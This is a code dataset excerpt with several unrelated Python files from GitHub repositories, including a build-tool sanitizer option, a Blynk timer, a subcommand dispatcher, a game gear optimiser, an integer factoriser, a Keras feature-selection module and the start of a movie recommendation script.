metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "7th-ndn-hackathon/Buffer-Interest_cxx",
"score": 2
} |
#### File: Buffer-Interest_cxx/.waf-tools/sanitizers.py
```python
def options(opt):
opt.add_option('--with-sanitizer', action='store', default='', dest='sanitizers',
help='Comma-separated list of compiler sanitizers to enable [default=none]')
def configure(conf):
for san in conf.options.sanitizers.split(','):
if not san:
continue
sanflag = '-fsanitize=%s' % san
conf.start_msg('Checking if compiler supports %s' % sanflag)
if conf.check_cxx(cxxflags=['-Werror', sanflag, '-fno-omit-frame-pointer'],
linkflags=[sanflag], mandatory=False):
conf.end_msg('yes')
conf.env.append_unique('CXXFLAGS', [sanflag, '-fno-omit-frame-pointer'])
conf.env.append_unique('LINKFLAGS', [sanflag])
else:
conf.end_msg('no', color='RED')
conf.fatal('%s sanitizer is not supported by the current compiler' % san)
``` |
{
"source": "7thTool/XMixly",
"score": 3
} |
#### File: common/lib/blynktimer.py
```python
try:
import utime as time
import uselect as select
except ImportError:
import time
import select
WAIT_SEC = 0.05
MAX_TIMERS = 16
DEFAULT_INTERVAL = 10
class TimerError(Exception):
pass
class Timer(object):
timers = {}
def __init__(self, no_timers_err=True):
self.no_timers_err = no_timers_err
def _get_func_name(self, obj):
if getattr(obj, '__name__', None) is None:
return self._get_func_name(obj.func)
return obj.__name__
def register(blynk, *args, interval=DEFAULT_INTERVAL, run_once=False, **kwargs):
class Deco(object):
def __init__(self, func):
self.func = func
if len(Timer.timers) >= MAX_TIMERS:
raise TimerError('Max allowed timers num={}'.format(MAX_TIMERS))
_timer = _Timer(interval, func, run_once, *args, **kwargs)
Timer.timers['{}_{}'.format(
len(Timer.timers), blynk._get_func_name(func))] = _timer
def __call__(self, *f_args, **f_kwargs):
return self.func(*f_args, **f_kwargs)
return Deco
@staticmethod
def stop(t_id):
timer = Timer.timers.get(t_id, None)
if timer is None:
raise TimerError('Timer id={} not found'.format(t_id))
Timer.timers[t_id].stopped = True
@staticmethod
def is_stopped(t_id):
timer = Timer.timers.get(t_id, None)
if timer is None:
raise TimerError('Timer id={} not found'.format(t_id))
return timer.stopped
def get_timers(self):
states = {True: 'Stopped', False: 'Running'}
return {k: states[v.stopped] for k, v in self.timers.items()}
def run(self):
# select call used cause time.sleep loads CPU up to 100% with small polling time
select.select([], [], [], WAIT_SEC)
timers_intervals = [curr_timer.run() for curr_timer in Timer.timers.values() if not curr_timer.stopped]
if not timers_intervals and self.no_timers_err:
raise TimerError('Running timers not found')
return timers_intervals
class _Timer(object):
def __init__(self, interval, deco, run_once, *args, **kwargs):
self.interval = interval
self.deco = deco
self.args = args
self.run_once = run_once
self.kwargs = kwargs
self.fire_time = None
self.fire_time_prev = None
self.stopped = False
def run(self):
timer_real_interval = 0
if self.fire_time is None:
self.fire_time = time.time() + self.interval
if self.fire_time_prev is None:
self.fire_time_prev = time.time()
curr_time = time.time()
if curr_time >= self.fire_time:
self.deco(*self.args, **self.kwargs)
if self.run_once:
self.stopped = True
timer_real_interval = curr_time - self.fire_time_prev
self.fire_time_prev = self.fire_time
self.fire_time = curr_time + self.interval
return timer_real_interval
``` |
{
"source": "7tupel/subcommander",
"score": 3
} |
#### File: subcommander/subcommander/subcommander.py
```python
import argparse
import sys
from .command import Command
class DuplicateCommandError(Exception):
"""Error if duplicate commands are detected
"""
def __init__(self, message, key):
"""
"""
super(DuplicateCommandError, self).__init__(message)
self.key = key
def build_command_dict(default, extensions):
"""merge the default commands and extended commands
:param [Command] default: list with default command classes
:param [Command] extensions: list with extended command classes
:raises DuplicateCommandError: if any command key is duplicated
:returns: dictionary with commands ins form 'command-key': CommandClass
"""
command_dict = {}
# filter duplicate commands from default command list
for command in default:
try:
command_dict[command.command] = command
except KeyError:
raise DuplicateCommandError('Duplicate Key detected', command.command)
# add additional commands and check for duplicates
for command in extensions:
if not command in default:
try:
command_dict[command.command] = command
except KeyError:
raise DuplicateCommandError('Duplicate Key detected', command.command)
else:
raise DuplicateCommandError('Duplicate Key detected', command.command)
return command_dict
class ArgumentParser(object):
"""Parse commandline arguments utilizing an inner argparse.ArgumentParser object
"""
def __init__(self, subcommander):
"""create the inner ArgumentParser and setup the help text
:param Subcommander subcommander: the outer Subcommander to get all available commands
"""
# inner argumentparser
self._subparser = argparse.ArgumentParser()
# perpare help text for the available subcommands
positional_args = ''
for cmd_key, cmd_obj in subcommander._commands.items():
positional_args = positional_args + ' {} {}\n'.format(
cmd_obj.command, cmd_obj.description)
# build usage text
self._usage = (
'{} ({})\n'
'\n'
'usage: {} [-h] <command> [<args>] \n'
'\n'
'positional arguments:\n'
'{}'
'\n'
'optional arguments:\n'
' -h, --help show this help message and exit'
'').format(subcommander._name, subcommander._version, subcommander._cmd, positional_args)
# overwrite the inner argumentparser help method to print the custom usage build above
setattr(self._subparser, 'format_help', lambda: print(self._usage))
def add_argument(self, *args, **kwargs):
"""wrapper to forward to inner ArgumentParser add_argument method
"""
return self._subparser.add_argument(*args, **kwargs)
def parse_args(self, *args, **kwargs):
"""wrapper to forward to inner ArgumentParser parse_args method
"""
return self._subparser.parse_args(*args, **kwargs)
def print_help(self):
"""print usage
"""
print(self._usage)
class Subcommander(object):
"""Subcommander class that takes a list of subcommands to execute
:param [Command] _default_commands: a list of default commands. used if further subclassing is necessary
:param str _name: the name of the application
:param str _cmd: the command used to execute the app from the commandline
:param str _version: version of the application
"""
_default_commands = []
_name = 'Subcommander'
_cmd = 'subcmd'
_version = '1.0'
def __init__(self, extensions=None):
"""setup the argument dispatching and add extended commands if provided
:param [Command] extensions: a list of optional Commands
"""
# merge default commands and custom app commands
if extensions is not None:
try:
self._commands = build_command_dict(self.__class__._default_commands, extensions)
except DuplicateCommandError as err:
print('Command Error!'
'Command duplication detected! Could not initialize custom commands.'
'Command \'{}\' already exists!'.format(err.key))
exit(1)
else:
self._commands = build_command_dict(self.__class__._default_commands, [])
# dispatch commands
parser = ArgumentParser(self)
parser.add_argument('command', help='the command to run')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
arguments = parser.parse_args(sys.argv[1:2])
if not arguments.command in self._commands:
print('Unrecognized command')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
self._commands[arguments.command]()(sys.argv[2:])
``` |
{
"source": "7tuv/ff14-materia-opt",
"score": 2
} |
#### File: ff14-materia-opt/src/main.py
```python
import sys
from calc_damage import MateriaOpt
from dataset import *
# equips = ["arm", "head", "body", "hands", "waist", "legs", "feet",
# "earrings", "necklace", "bracelets", "ring1", "ring2"]
def get_selected_dataset(dataset, choice_eq):
rtn = {}
for i in zip(dataset.keys(), choice_eq):
rtn[i[0]] = (dataset[i[0]][i[1]],)
return rtn
if __name__ == "__main__":
dataset = get_dataset_brd_il600()
# dataset = get_dataset_brd_il530()
# dataset = get_dataset_whm_il530()
# dataset = get_dataset_brd_il510()
# choice_eq = [0, 1, 0, 0, 0, 1, 1, # 6.0
# 0, 1, 1, 0, 0] # brd最適装備(計算) https://etro.gg/gearset/865fc886-994f-4c28-8fc1-4379f160a916
# dataset = get_selected_dataset(dataset, choice_eq)
### 準備 ###
obj = MateriaOpt(dataset)
obj.set_rate_dmgsrc(aa=0.1259, dot=0.1272, ss=0.4175) # BRD
#### GCD 条件 #### http://allaganstudies.akhmorning.com/stats/speed/
# obj.set_ss_condition(26) # 制約条件: GCDが少なくとも 2.49 以下
# obj.set_ss_condition(127) # 制約条件: GCDが少なくとも 2.48 以下
# obj.set_ss_condition(432) # 制約条件: GCDが少なくとも 2.45 以下
# obj.set_ss_condition(534) # 制約条件: GCDが少なくとも 2.44 以下
# obj.set_ss_condition(635) # 制約条件: GCDが少なくとも 2.43 以下
# obj.set_ss_condition(737) # 制約条件: GCDが少なくとも 2.42 以下
# obj.set_ss_condition(838) # 制約条件: GCDが少なくとも 2.41 以下
# obj.set_ss_condition(940) # 制約条件: GCDが少なくとも 2.40 以下
# obj.set_ss_condition(1041) # 制約条件: GCDが少なくとも 2.39 以下
# obj.set_ss_condition(1143) # 制約条件: GCDが少なくとも 2.39 以下
# obj.set_ss_condition(1244) # 制約条件: GCDが少なくとも 2.38 以下
#### 信仰 条件 ####
# obj.set_pi_condition(462) # 制約条件: 信仰が少なくとも X 以上
# obj.set_pi_condition(1000) # 制約条件: 信仰が少なくとも X 以上
#### 飯を含めたうえでの最適値を計算 ####
obj.set_meshi(ch=90, ss=54) # 6.0パンプキンラタトゥイユHQ◎
# obj.set_meshi(ch=54, dt=90) # 6.0パンプキンポタージュHQ
# obj.set_meshi(ch=108, dt=179) # 5.4スモークチキンHQ
# obj.set_meshi(ch=179, ss=108) # 5.4チキンフェットゥチーネHQ
# obj.set_meshi(dt=108, dh=179) # 5.4ピッツァHQ
# obj.set_meshi(ch=101, dt=168) # 5.2 高地風挽肉のキャベツ巻きHQ
obj.set_calcset(version="6.0")
# obj.set_calcset(version="5.5")
#### 最適化問題を解く ####
obj.calc_damage()
``` |
{
"source": "7u83/IntFac",
"score": 3
} |
#### File: 7u83/IntFac/factorize.py
```python
import sys
def getbit(i, n):
return (i >> n) & 1
def setbit(i, n, val=1):
if val == 1:
return i | (1 << n)
return i & (~(1 << n))
def bitcmp(i1, i2, n):
for i in range(0, n):
b2 = getbit(i2, i)
b1 = getbit(i1, i)
if b1 != b2:
return b1 - b2
return 0
def fac_check(i, i1, i2, bits):
p = i1 * i2
if p > i:
return -3
if p == i:
if i1 == 1 or i2 == 1:
return -4
return 10
return bitcmp(i, p, bits)
def factorize_run(i, i1, i2, n):
for b in range(0, 4):
i1 = setbit(i1, n, getbit(b, 0))
i2 = setbit(i2, n, getbit(b, 1))
rc = fac_check(i, i1, i2, n + 1)
if rc == 10:
return factorize(i1) + factorize(i2)
if rc == 0:
f = factorize_run(i, i1, i2, n + 1)
if f != [i]:
return f
return [i]
def factorize(i):
l = factorize_run(i, 0, 0, 0)
l.sort()
return l
fpr = int(sys.argv[1])
print (("Factorizing " + str(fpr) + " ..."))
rc = factorize(fpr)
print (rc)
``` |
{
"source": "7u/leetcode",
"score": 3
} |
#### File: leetcode/medium/arithmeticSlices.py
```python
def numberOfArithmeticSlices(A):
"""
:type A: List[int]
:rtype: int
"""
n = len(A)
if n < 3:
return 0
sum = 0
silcecLen = 2
diff = A[1] - A[0]
for i in range(2, n):
newDiff = A[i] - A[i - 1]
if diff == newDiff:
silcecLen += 1
else:
if silcecLen >= 3:
sum += silcecLen * (silcecLen - 3) / 2 + 1
silcecLen = 2
diff = newDiff
if silcecLen >= 3:
sum += silcecLen * (silcecLen - 3) / 2 + 1
return sum
``` |
{
"source": "7up4/amcl",
"score": 2
} |
#### File: package/model/neural_networks.py
```python
import os
import tensorflow as tf
import matplotlib.pyplot as plt
import random
import pandas as pd
import numpy as np
import keras.initializers
import keras.optimizers
from networkx import Graph, find_cliques
from sklearn.metrics import roc_curve, auc
from keras.layers import Concatenate, Input, Embedding, Lambda, Activation, BatchNormalization
from keras.layers.core import Dense, Dropout, Reshape
from keras.models import load_model, model_from_json, model_from_yaml, Model
from keras.utils.vis_utils import plot_model
from keras.callbacks import TensorBoard
from .datasets import DataSet
from .importing_modules import *
class NeuralNetworkConfig:
def __init__(self, categorical_input: str="cat_input", continuous_input: str="cont_input", output: str="output",
reshaped_output: str="reshaped_output", noisy_layer: str="noisy", kernel_initializer: str="uniform",
hidden: str = "hidden", reshaped: str="reshaped", dropout: str="dropout", merge: str="merge",
activation: str="relu", output_activation: str="sigmoid", batch_normalization: bool=False):
self.kernel_initializer = kernel_initializer
self.activation = activation
self.output_activation = output_activation
self.cont_input = continuous_input
self.cat_input = categorical_input
self.hidden = hidden
self.noisy_layer = noisy_layer
self.reshaped = reshaped
self.merge = merge
self.dropout = dropout
self.output = output
self.reshaped_output = reshaped_output
self.batch_normalization = batch_normalization
class NeuralNetwork:
def __init__(self, model):
self.__model = model
def get_model(self):
return self.__model
@classmethod
def from_file(cls, from_file: str):
model = load_model(from_file)
return cls(model)
def get_layer(self, name):
return self.__model.get_layer(name)
def get_weights(self):
return self.__model.get_weights()
def set_weights(self, weights):
self.__model.set_weights(weights)
def get_weights_for_layer(self, feature):
return self.__model.get_layer(feature).get_weights()
def get_weights_with_name(self):
model = self.__model
names = [layer.name for layer in model.layers]
weights = []
for name in names:
weights.append(model.get_layer(name).get_weights())
return dict(zip(names, weights))
def set_weights_by_name(self, weights):
for name, weight in weights.items():
self.__model.get_layer(name).set_weights(weight)
def save_plot(self, to_file='model_plot.svg', shapes=False, layer_names=False):
if to_file:
plot_model(self.__model, to_file=to_file, show_shapes=shapes, show_layer_names=layer_names)
def compile(self, loss='binary_crossentropy', lr=0.001):
optimizer=keras.optimizers.Adam(lr=lr)
self.__model.compile(loss=loss, optimizer=optimizer, metrics=['accuracy'])
def export(self, to_file):
if to_file:
name, ext = os.path.splitext(to_file)
if ext == '.h5':
self.__model.save(to_file)
elif ext == '.json':
model_json = self.__model.to_json()
with(to_file, 'w') as json_file:
json_file.write(model_json)
elif ext == '.yaml':
model_yaml = self.__model.to_yaml()
with(to_file, 'w') as yaml_file:
yaml_file.write(model_yaml)
class DenseNeuralNetwork(NeuralNetwork):
@classmethod
def from_scratch(cls, config: NeuralNetworkConfig, dataset, hidden_units: int,
embedding_size: int = 10, dropout_rate: float = 0.0,
output_units=1, embedding_layers_trainable=True):
categorical_data = dataset.get_data(without_resulting_feature=True).select_dtypes(include='category')
continuous_features = dataset.get_data(without_resulting_feature=True).select_dtypes(
exclude='category').columns.size
if isinstance(categorical_data, pd.DataFrame):
categorical_data_categories = {}
for column in categorical_data:
categorical_data_categories[column] = categorical_data[column].cat.categories.size
categorical_data = categorical_data_categories
model = DenseNeuralNetwork._build(config, categorical_data, continuous_features, hidden_units, embedding_size,
dropout_rate, output_units, embedding_layers_trainable)
return cls(model)
@staticmethod
def _build(config, categorical_data_categories, continuous_features: int, hidden_units: int, embedding_size: int,
dropout_rate, output_units: int, embedding_layers_trainable):
# create input layer for continuous data
continuous_input = Input(shape=(continuous_features,), name=config.cont_input)
reshaped_continuous_input = Reshape((1, continuous_features),
name=config.reshaped)(continuous_input)
# create input layers complemented by embedding layers to handle categorical features
embedding_layers = []
categorical_inputs = []
for feature, size in categorical_data_categories.items():
categorical_input = Input((1,), name=config.cat_input + "_" + feature)
categorical_inputs.append(categorical_input)
embedding_layer = Embedding(size, embedding_size, name=feature, trainable=embedding_layers_trainable)(
categorical_input)
embedding_layers.append(embedding_layer)
# merge all inputs
merge_layer = Concatenate(name=config.merge)(embedding_layers + [reshaped_continuous_input])
# hidden layers
hidden_layer = Dense(hidden_units, kernel_initializer=config.kernel_initializer,
name=config.hidden)(merge_layer)
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
dropout_layer = Dropout(dropout_rate, name=config.dropout)(hidden_layer)
# output_layer
output_layer = Dense(output_units, name=config.output)(dropout_layer)
output_layer = Activation(config.output_activation)(output_layer)
# add reshape layer since output should be vector
output_layer = Reshape((1,), name=config.reshaped_output)(output_layer)
# create final model
model = Model(inputs=categorical_inputs + [continuous_input], outputs=output_layer)
return model
class OptimizedNeuralNetwork(NeuralNetwork):
@classmethod
def from_scratch(cls, config: NeuralNetworkConfig, dataset: DataSet, correlation_info: list, embedding_size: int=10,
dropout_rate: float=0.0, output_units=1):
flatten_correlation = [item for sublist in correlation_info for item in sublist]
features = dataset.get_data(without_resulting_feature=True).columns
if not all(elem in features for elem in flatten_correlation):
return None
diff = list(set(features) - set(flatten_correlation))
diff = [[item] for item in diff]
correlation_info.extend(diff)
categorical_data = dataset.get_data(without_resulting_feature=True).select_dtypes(include='category')
continuous_features = dataset.get_data(without_resulting_feature=True).select_dtypes(exclude='category').columns
if isinstance(categorical_data, pd.DataFrame):
categorical_data_categories = {}
for column in categorical_data:
categorical_data_categories[column] = categorical_data[column].cat.categories.size
categorical_data = categorical_data_categories
model = OptimizedNeuralNetwork._build(config, categorical_data, continuous_features, correlation_info,
embedding_size, dropout_rate, output_units)
return cls(model)
@staticmethod
def _build(config: NeuralNetworkConfig, categorical_data_categories: dict, continuous_features: list,
correlation_info: list,embedding_size: int, dropout_rate: float, output_units: int):
feature_layers = {}
hidden_layers = []
inputs = []
for feature, size in categorical_data_categories.items():
categorical_input = Input((1,), name=config.cat_input + "_" + feature)
inputs.append(categorical_input)
embedding_layer = Embedding(size, embedding_size, name=feature)(categorical_input)
feature_layers[feature] = embedding_layer
for feature in continuous_features:
continuous_input = Input((1,), name=config.cont_input + "_" + feature)
inputs.append(continuous_input)
reshaped_continuous_input = Reshape((1, 1), name=feature)(continuous_input)
feature_layers[feature] = reshaped_continuous_input
for couple in correlation_info:
coupled_layers = [feature_layers[feature] for feature in couple]
if len(couple) > 1:
merge_layer = Concatenate()(coupled_layers)
hidden_layer = Dense(1, kernel_initializer=config.kernel_initializer)(merge_layer)
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
else:
hidden_layer = Dense(1, kernel_initializer=config.kernel_initializer)(coupled_layers[0])
if config.batch_normalization:
hidden_layer = BatchNormalization()(hidden_layer)
hidden_layer = Activation(config.activation)(hidden_layer)
hidden_layers.append(hidden_layer)
merge_layer = Concatenate()(hidden_layers)
dropout_layer = Dropout(dropout_rate, name=config.dropout)(merge_layer)
# output_layer
output_layer = Dense(1, name=config.output)(dropout_layer)
output_layer = Activation(config.output_activation)(output_layer)
# add reshape layer since output should be vector
output_layer = Reshape((output_units,), name=config.reshaped_output)(output_layer)
# create final model
model = Model(inputs=inputs, outputs=output_layer)
return model
class Trainer:
def __init__(self, nnet: NeuralNetwork, training_dataset, training_target, batch_size=32, epochs=1000):
self.__nnet = nnet
self.__training_dataset = training_dataset
self.__training_target = training_target
self.__batch_size = batch_size
self.__epochs = epochs
self.__score = None
self._preprocess_dataset()
def _preprocess_dataset(self):
categorical_data = DataSet.dataframe_to_series(self.__training_dataset.get_data(without_resulting_feature=True).select_dtypes(include='category'))
if isinstance(self.__nnet, OptimizedNeuralNetwork):
continuous_data = DataSet.dataframe_to_series(self.__training_dataset.get_data(without_resulting_feature=True).select_dtypes(exclude='category'))
self.__training_dataset = [*categorical_data, *continuous_data]
else:
continuous_data = self.__training_dataset.get_data().select_dtypes(exclude='category').values
self.__training_dataset = [*categorical_data, continuous_data]
def train(self, verbose=1):
tensorboard = TensorBoard(log_dir="./logs")
self.__nnet.get_model().fit(self.__training_dataset, self.__training_target, batch_size=self.__batch_size,
epochs=self.__epochs, verbose=verbose, shuffle=False, callbacks=[tensorboard])
def evaluate(self, verbose=1):
self.__score = self.__nnet.get_model().evaluate(self.__training_dataset, self.__training_target,
batch_size=self.__batch_size, verbose=verbose)
def get_score(self):
return self.__score
class Predictor:
def __init__(self, nnet: NeuralNetwork, dataset: DataSet):
self._nnet = nnet
self._dataset = dataset
self._score = {}
self._prediction = []
self._preprocess()
def _preprocess(self):
categorical_data = DataSet.dataframe_to_series(self._dataset.get_data().select_dtypes(include='category'))
if isinstance(self._nnet, OptimizedNeuralNetwork):
continuous_data = DataSet.dataframe_to_series(self._dataset.get_data().select_dtypes(exclude='category'))
self._dataset = [*categorical_data, *continuous_data]
else:
continuous_data = self._dataset.get_data().select_dtypes(exclude='category').values
self._dataset = [*categorical_data, continuous_data]
def predict(self):
self._prediction = self._nnet.get_model().predict(self._dataset).flatten()
return self._prediction
def evaluate(self, real_values, show_plot: bool = False):
if len(self._prediction) > 0:
rounded_pred = np.round(self._prediction)
tp = np.sum(np.logical_and(rounded_pred == 1, real_values == 1))
tn = np.sum(np.logical_and(rounded_pred == 0, real_values == 0))
fp = np.sum(np.logical_and(rounded_pred == 1, real_values == 0))
fn = np.sum(np.logical_and(rounded_pred == 0, real_values == 1))
accuracy = (tp + tn) / (tp + fp + fn + tn)
self._score['ppv'] = tp / (tp + fp)
self._score['npv'] = tn / (tn + fn)
self._score['recall'] = tp / (tp + fn)
self._score['specificity'] = tn / (tn + fp)
self._score['accuracy'] = accuracy
self._score['tp'] = tp
self._score['tn'] = tn
self._score['fp'] = fp
self._score['fn'] = fn
if show_plot:
self._roc(real_values, np.unique(real_values).size)
def _roc(self, real_values, n_classes):
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(real_values, self._prediction)
roc_auc[i] = auc(fpr[i], tpr[i])
plt.figure()
lw = 1
plt.plot(fpr[1], tpr[1], color='darkorange',
lw=lw, label='AUC = %0.2f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.0])
plt.xlabel('Ложно-положительные решения')
plt.ylabel('Истино-положительные решения')
plt.title('Кривая ошибок')
plt.legend(loc="lower right")
plt.show()
def get_score(self):
return self._score
def get_prediction(self):
return self._prediction
class FeatureSelector:
def __init__(self, config: NeuralNetworkConfig, nnet: DenseNeuralNetwork, training_dataset):
self._source_model = nnet
self._config = config
self._training_dataset = training_dataset
categorical_columns = training_dataset.get_data(without_resulting_feature=True).select_dtypes(include='category').columns
self._weights = self._source_model.get_weights_with_name()
self._cat_input_shape = self._source_model.get_layer(config.cat_input + "_" + categorical_columns[0]).get_input_shape_at(0)
self._cont_input_shape = self._source_model.get_layer(config.cont_input).get_input_shape_at(0)[-1]
self._hid_size = self._source_model.get_layer(config.hidden).get_output_shape_at(0)[-1]
self._emb_size = self._source_model.get_layer(categorical_columns[0]).get_output_shape_at(0)[-1]
self._dropout_rate = self._source_model.get_layer(config.dropout).get_config()['rate']
self._cat_data = {}
for x in categorical_columns:
self._cat_data[x] = self._source_model.get_layer(x).get_config()["input_dim"] - 1
def _build_network(self, config, dataset, full_copy: bool = False):
noisy_model = DenseNeuralNetwork.from_scratch(config=config, dataset=dataset,
hidden_units=self._hid_size, embedding_size=self._emb_size,
dropout_rate=self._dropout_rate,embedding_layers_trainable=False)
return noisy_model
def run(self, training_dataset, training_target, test_dataset, test_target, noise_rate=0.01, training_epochs=100, batch_size=8, lr=0.001):
training_dataset = DataSet.copy(training_dataset)
test_dataset = DataSet.copy(test_dataset)
predictor = Predictor(self._source_model, test_dataset)
prediction = predictor.predict()
predictor.evaluate(test_target)
prev_accuracy = predictor.get_score()['accuracy']
curr_accuracy = predictor.get_score()['accuracy']
features_to_remove = []
# noise_rate = random.uniform(0, noise_rate)
while curr_accuracy >= prev_accuracy:
for column in training_dataset.get_data().columns:
if test_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
else:
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
noisy_prediction = predictor.predict()
sensitivity = abs(np.sum(noisy_prediction) - np.sum(prediction)) / len(noisy_prediction)
test_dataset.get_features().set_sensitivity(column, sensitivity)
training_dataset.get_features().set_sensitivity(column, sensitivity)
print("Sensitivity of %s: %f" % (column, training_dataset.get_features().get_sensitivity(column)))
less_sensitive_feature = test_dataset.get_features().get_less_sensitive_feature()
features_to_remove.append(less_sensitive_feature)
test_dataset.rm_less_sensitive()
training_dataset.rm_less_sensitive()
emb_weights = {feature: self._weights[feature] for feature in training_dataset.get_data().select_dtypes(include='category').columns.tolist()}
self._source_model = self._build_network(self._config, training_dataset)
self._source_model.compile(lr=lr)
self._source_model.set_weights_by_name(emb_weights)
trainer = Trainer(self._source_model, training_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
self._weights = self._source_model.get_weights_with_name()
predictor = Predictor(self._source_model, test_dataset)
prediction = predictor.predict()
predictor.evaluate(test_target)
prev_accuracy, curr_accuracy = curr_accuracy, predictor.get_score()['accuracy']
print(prev_accuracy)
print(curr_accuracy)
return features_to_remove[:-1]
class CorrelationAnalyzer:
def __init__(self, config: NeuralNetworkConfig, nnet: DenseNeuralNetwork, training_dataset):
self._source_model = nnet
self._config = config
self._training_dataset = training_dataset
self._columns = self._training_dataset.get_data().columns
categorical_columns = training_dataset.get_data(without_resulting_feature=True).select_dtypes(
include='category').columns
self._weights = None
self._emb_weights = None
self._cat_input_shape = self._source_model.get_layer(config.cat_input + "_" + categorical_columns[0]).get_input_shape_at(0)
self._cont_input_shape = self._source_model.get_layer(config.cont_input).get_input_shape_at(0)[-1]
self._hid_size = self._source_model.get_layer(config.hidden).get_output_shape_at(0)[-1]
self._emb_size = self._source_model.get_layer(categorical_columns[0]).get_output_shape_at(0)[-1]
self._dropout_rate = self._source_model.get_layer(config.dropout).get_config()['rate']
self._table = np.empty([len(categorical_columns)+self._cont_input_shape+1, len(categorical_columns)+self._cont_input_shape+1])
self._cat_data = {}
for x in categorical_columns:
self._cat_data[x] = self._source_model.get_layer(x).get_config()["input_dim"] - 1
def _build_network(self, config, dataset, full_copy: bool = False):
noisy_model = DenseNeuralNetwork.from_scratch(config=config, dataset=dataset,
hidden_units=self._hid_size, embedding_size=self._emb_size,
dropout_rate=self._dropout_rate,embedding_layers_trainable=False)
if not full_copy:
noisy_model.set_weights_by_name(self._emb_weights)
else:
noisy_model.set_weights_by_name(self._weights)
return noisy_model
def run(self, test_dataset, training_dataset, training_target, noise_rate=0.01, training_epochs=100, batch_size=32, lr=0.03):
training_dataset = DataSet.copy(training_dataset)
trainer = Trainer(self._source_model, training_dataset, training_target, epochs=training_epochs)
trainer.train()
trainer.evaluate()
self._weights = self._source_model.get_weights_with_name()
self._emb_weights = {feature: self._weights[feature] for feature in list(self._cat_data.keys())}
predictor = Predictor(self._source_model, test_dataset)
self._table[0][0] = np.sum(predictor.predict())
# noise_rate = random.uniform(0, noise_rate)
for idx, column in enumerate(self._columns):
if training_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(training_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._build_network(self._config, training_dataset)
noisy_model.compile(lr=lr)
trainer = Trainer(noisy_model, noisy_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
predictor = Predictor(noisy_model, test_dataset)
else:
noisy_dataset = DataSet.copy(training_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._build_network(self._config, training_dataset)
noisy_model.compile(lr=lr)
trainer = Trainer(noisy_model,noisy_dataset, training_target, epochs=training_epochs, batch_size=batch_size)
trainer.train()
trainer.evaluate()
predictor = Predictor(noisy_model, test_dataset)
noisy_prediction = predictor.predict()
self._table[0][idx+1] = abs(np.sum(noisy_prediction) - self._table[0][0]) / len(noisy_prediction)
for idx, column in enumerate(self._columns):
if test_dataset.get_data()[column].dtype.name == 'category':
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_categorical_columns(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, test_dataset)
else:
noisy_dataset = DataSet.copy(test_dataset)
noisy_dataset.add_noise_to_column(column, noise_rate)
noisy_model = self._source_model
predictor = Predictor(noisy_model, noisy_dataset)
noisy_prediction = predictor.predict()
self._table[idx + 1][0] = abs(np.sum(noisy_prediction) - self._table[0][0]) / len(noisy_prediction)
for c in range(len(self._cat_data)+self._cont_input_shape):
for idx in range(len(self._cat_data)+self._cont_input_shape):
self._table[idx+1][c+1] = abs(self._table[idx+1][0] - self._table[0][c+1])
self._table = np.delete(self._table, 0, 0)
self._table = np.delete(self._table, 0, 1)
self._table = pd.DataFrame(data=self._table, index=self._columns, columns=self._columns)
self._table.loc['mean'] = self._table.mean()
return self._table
def select_candidates(self):
candidates = pd.DataFrame(columns=self._columns)
fcandidates = []
for column in self._table:
candidates[column] = pd.Series((self._table.loc[self._table[column] > self._table[column]['mean']]).index)
for column in candidates:
for row in range(candidates.shape[0]):
if candidates[column][row] == candidates[column][row] and candidates[column][row] != column:
if column in candidates[candidates[column][row]].tolist():
fcandidates.append([column, candidates[column][row]])
[l.sort() for l in fcandidates]
fcandidates = [l for l in fcandidates if fcandidates.count(l) == 2]
fcandidates = [tuple(x) for x in set(tuple(x) for x in fcandidates)]
correlation_graph = Graph()
correlation_graph.add_edges_from(fcandidates)
fcandidates = list(find_cliques(correlation_graph))
return fcandidates
``` |
{
"source": "7u/pci",
"score": 3
} |
#### File: pci-code/chapter2/recommendations.py
```python
critics={'<NAME>': {'Lady in the Water': 2.5, 'Snakes on a Plane': 3.5,
'Just My Luck': 3.0, 'Superman Returns': 3.5, 'You, Me and Dupree': 2.5,
'The Night Listener': 3.0},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 3.5,
'Just My Luck': 1.5, 'Superman Returns': 5.0, 'The Night Listener': 3.0,
'You, Me and Dupree': 3.5},
'<NAME>': {'Lady in the Water': 2.5, 'Snakes on a Plane': 3.0,
'Superman Returns': 3.5, 'The Night Listener': 4.0},
'<NAME>': {'Snakes on a Plane': 3.5, 'Just My Luck': 3.0,
'The Night Listener': 4.5, 'Superman Returns': 4.0,
'You, Me and Dupree': 2.5},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'Just My Luck': 2.0, 'Superman Returns': 3.0, 'The Night Listener': 3.0,
'You, Me and Dupree': 2.0},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'The Night Listener': 3.0, 'Superman Returns': 5.0, 'You, Me and Dupree': 3.5},
'Toby': {'Snakes on a Plane':4.5,'You, Me and Dupree':1.0,'Superman Returns':4.0}}
from math import sqrt
# Returns a distance-based similarity score for person1 and person2
